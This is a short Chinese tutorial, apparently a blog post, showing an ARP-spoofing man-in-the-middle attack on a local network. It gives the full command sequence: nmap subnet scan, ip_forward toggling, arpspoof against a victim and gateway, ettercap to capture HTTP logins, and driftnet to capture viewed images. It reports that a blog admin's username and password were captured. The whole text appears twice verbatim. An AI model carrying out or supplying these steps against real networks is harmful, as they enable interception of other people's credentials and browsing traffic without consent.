攻击者IP 192.168.1.104 系统:kali Linux
受害者IP 192.168.1.102 系统:Windows 10
先看看IP顺便测试下能否上网
一切正常
打开kali,获取IP ifconfig
使用nmap扫描局域网下所有IP nmap 192.168.1.0/24
获取受害者IP后
echo 0 > /proc/sys/net/ipv4/ip_forward
arpspoof -t 192.168.1.102 192.168.1.1 -i eth0 -t后写受害者IP
查看是否可以上网
成功
接下来测试获取受害者访问信息
结束当前攻击
echo 1 > /proc/sys/net/ipv4/ip_forward
arpspoof -t 192.168.1.102 192.168.1.1 -i eth0
执行
另打开一个终端
ettercap -Tq -i eth0 eth0为你的网卡
这时受害者可以上网,但他的网络信息都会经过我们的IP
我们可以获得受害者所访问的网站(仅限http协议的网站)
我们试着等入一土博客的后台
账号密码就被记录了
我们还可以记录受害者浏览图片的信息
driftnet -i eth0
这里就不演示了
攻击者IP 192.168.1.104 系统:kali Linux
受害者IP 192.168.1.102 系统:Windows 10
先看看IP顺便测试下能否上网
一切正常
打开kali,获取IP ifconfig
使用nmap扫描局域网下所有IP nmap 192.168.1.0/24
获取受害者IP后
echo 0 > /proc/sys/net/ipv4/ip_forward
arpspoof -t 192.168.1.102 192.168.1.1 -i eth0 -t后写受害者IP
查看是否可以上网
成功
接下来测试获取受害者访问信息
结束当前攻击
echo 1 > /proc/sys/net/ipv4/ip_forward
arpspoof -t 192.168.1.102 192.168.1.1 -i eth0
执行
另打开一个终端
ettercap -Tq -i eth0 eth0为你的网卡
这时受害者可以上网,但他的网络信息都会经过我们的IP
我们可以获得受害者所访问的网站(仅限http协议的网站)
我们试着等入一土博客的后台
账号密码就被记录了
我们还可以记录受害者浏览图片的信息
driftnet -i eth0
这里就不演示了